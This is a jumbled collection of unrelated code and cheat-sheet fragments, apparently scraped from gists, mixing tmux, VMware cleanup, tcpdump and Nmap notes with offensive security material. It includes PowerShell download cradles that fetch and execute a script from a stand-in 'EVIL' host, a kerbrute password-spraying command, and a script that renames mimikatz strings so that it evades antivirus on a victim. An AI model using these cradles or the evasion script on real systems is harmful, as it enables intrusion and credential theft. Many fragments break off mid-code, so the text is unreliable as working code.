start new:
tmux
start new with session name:
tmux new -s myname
# This script will manually rip out all VMware Tools registry entries and files for Windows 2008-2019 | |
# Tested for 2019, 2016, and probably works on 2012 R2 after the 2016 fixes. | |
# This function pulls out the common ID used for most of the VMware registry entries along with the ID | |
# associated with the MSI for VMware Tools. | |
function Get-VMwareToolsInstallerID { | |
foreach ($item in $(Get-ChildItem Registry::HKEY_CLASSES_ROOT\Installer\Products)) { | |
If ($item.GetValue('ProductName') -eq 'VMware Tools') { | |
return @{ | |
reg_id = $item.PSChildName; |
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
Nmap currently has no way to detect whether the service running on TCP port 1801 is [Microsoft Message Queuing (MSMQ)][wikipedia_msmq]. The file msmq-service-probe
here has been developed to give Nmap the capability to detect MSMQ. The objective is to help identify assets with MSMQ exposed, that may be vulnerable to [CVE-2023-21554][nist_cve_2023_21554], aka QueueJumper.
This works by sending a MSMQ packet to port 1801 and checking if the response matches an expected fingerprint.
You can run this probe as follows:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
Tcpdump is a CLI tool to capture raw network packets. This is useful for various forms of network troubleshooting. This cheat sheet covers all the basic and advanced options for tcpdump.
Tcpdump command is a famous network packet analyzing tool that is used to display TCP\IP & other network packets being transmitted over the network attached to the system on which tcpdump has been installed. Tcpdump uses libpcap library to capture the network packets & is available on almost all Linux/Unix flavors.
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
function Get-KerberosAESKey | |
{ | |
<# | |
.SYNOPSIS | |
Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The | |
results have been verified against the test values in RFC3962, MS-KILE, and my own test lab. | |
https://tools.ietf.org/html/rfc3962 | |
https://msdn.microsoft.com/library/cc233855.aspx |
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/windows | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |